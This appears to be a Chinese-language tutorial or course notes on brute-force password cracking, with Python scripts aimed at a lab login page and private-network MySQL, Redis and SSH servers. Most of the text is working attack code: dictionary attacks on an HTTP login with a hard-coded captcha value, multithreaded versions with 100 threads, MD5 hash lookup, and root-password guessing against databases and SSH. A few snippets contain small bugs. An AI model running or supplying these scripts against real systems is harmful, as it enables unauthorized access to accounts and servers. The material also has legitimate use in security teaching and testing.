暴力破解
1 概述
暴力破解,是一种针对密码的破译方法,将密码进行逐个推算直到找出真正的密码为止。
2 爆破HTTP协议
第一步:实验性发送请求成功
import requests
url = "http://192.172.0.100:8080/woniusales/user/login"
data = {
"username":"admin",
"password":"123456",
"verifycode":"0000"
}
result = requests.post(url=url,data=data)
if result.text != "login-fail":
print(f"疑是破解成功,密码是:{password}")
第二步:已知用户名,未知密码破解
import requests
def pojie_http(password):
url = "http://192.172.0.100:8080/woniusales/user/login"
data = {
"username":admin,
"password":password,
"verifycode":"0000"
}
result = requests.post(url=url,data=data)
if result.text != "login-fail":
print(f"疑是破解成功,密码是:{password}")
exit()
with open(file="password.txt") as f:
passwordlist = f.readlines()
for passwd in passwordlist:
passwd = passwd.strip()
pojie_http(passwd)
第三步:未知用户名密码破解
import requests
def pojie_http(username,password):
url = "http://192.172.0.100:8080/woniusales/user/login"
data = {
"username":username,
"password":password,
"verifycode":"0000"
}
result = requests.post(url=url,data=data)
if result.text != "login-fail":
print(f"疑是破解成功,密码是:{password}")
exit()
with open(file="password.txt") as f:
passwordlist = f.readlines()
with open(file="username.txt") as f:
usernamelist = f.readlines()
for user in usernamelist:
user = user.strip()
for passwd in passwordlist:
passwd = passwd.strip()
pojie_http(user,passwd)
注意:
1.暴力破解不是100%能破解成功,取决于你是否有强大的字典
2.并不是所有的http协议可以暴力破解
2.1 简单的验证码
2.2 没有错误次数的验证
2.3 明文显示,未经过加密
3 多线程破解
一个用户作为一个线程爆破
for user in usernamelist:
obj = threading.Thread(target=pojie_http,args=(user,))
obj.start()
# 1.受到本机的性能影响,最大1300线程
# 2.受到服务器性能影响,最大吞吐量
4 多线程分配任务破解
import threading
import requests
def pojie_http(startindex,endindex):
url = "http://192.172.0.100:8080/woniusales/user/login"
for user in usernamelist[startindex:endindex]:
user = user.strip()
for passwd in passwordlist:
passwd = passwd.strip()
data = {
"username":user,
"password":passwd,
"verifycode":"0000"
}
result = requests.post(url=url,data=data)
if result.text != "login-fail":
print(f"疑是破解成功,用户名是{user},密码是:{passwd}")
exit()
if __name__ == '__main__':
with open(file="username.txt") as f:
usernamelist = f.readlines()
with open(file="password.txt") as f:
passwordlist = f.readlines()
# 分任务爆破,启动100个线程,每个线程跑20个用户,每个用户跑所有的密码,根据服务器动态调整线程个数
for index in range(100):
start = 20 * index
end = 20 * (index + 1)
obj = threading.Thread(target=pojie_http,args=(start,end)) # 0-10 10-20 20-30 30-40 ...190-200
obj.start()
5 MD5爆破
MD5无法逆推解密,只能通过穷举法反向查询
import hashlib
def pojie_md5(source,target):
h_md5 = hashlib.md5(source.encode()).hexdigest()
print(h_md5)
if h_md5 == target:
print(f"怀疑是破解成功:{source}")
exit()
if __name__ == '__main__':
target = "e10adc3949ba59abbe56e057f20f883e"
with open(file="password.txt") as f:
data_list = f.readlines()
for i in data_list:
i = i.strip()
pojie_md5(source=i,target=target)
6 MySQL爆破
import pymysql
def pojie_mysql(passwd):
try:
conn = pymysql.connect(user="root",password=passwd,port=3306,host="192.172.0.100")
except:
pass
# 连接成功什么都没有 连接失败报错
else:
print(f"疑是破解成功:{passwd}")
exit()
if __name__ == '__main__':
with open(file="password.txt") as f:
data_list = f.readlines()
for passwd in data_list:
pojie_mysql(passwd.strip())
7 Redis爆破
import redis
def pojie_redis(passwd):
try:
redis_obj = redis.Redis(host="192.172.0.101",password=passwd,db=0)
redis_obj.ping()
except:
pass
else:
print(f"密码是{passwd}")
exit()
if __name__ == '__main__':
with open(file="password.txt") as f:
data_list = f.readlines()
for passwd in data_list:
pojie_redis(passwd.strip())
8 SSH爆破
import paramiko
from paramiko.client import AutoAddPolicy
def pojie_ssh(passwd):
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(AutoAddPolicy)
ssh.connect(hostname="192.172.0.100",username="root",password=passwd)
except:
pass
else:
print(f"密码是{passwd}")
exit()
if __name__ == '__main__':
with open(file="password.txt") as f:
data_list = f.readlines()
for passwd in data_list:
pojie_ssh(passwd.strip())
9 爆破工具
https://blog.csdn.net/m0_59598029/article/details/133217000
https://blog.51cto.com/u_16213303/10539031
https://www.zhihu.com/tardis/bd/art/558677293?source_id=1001
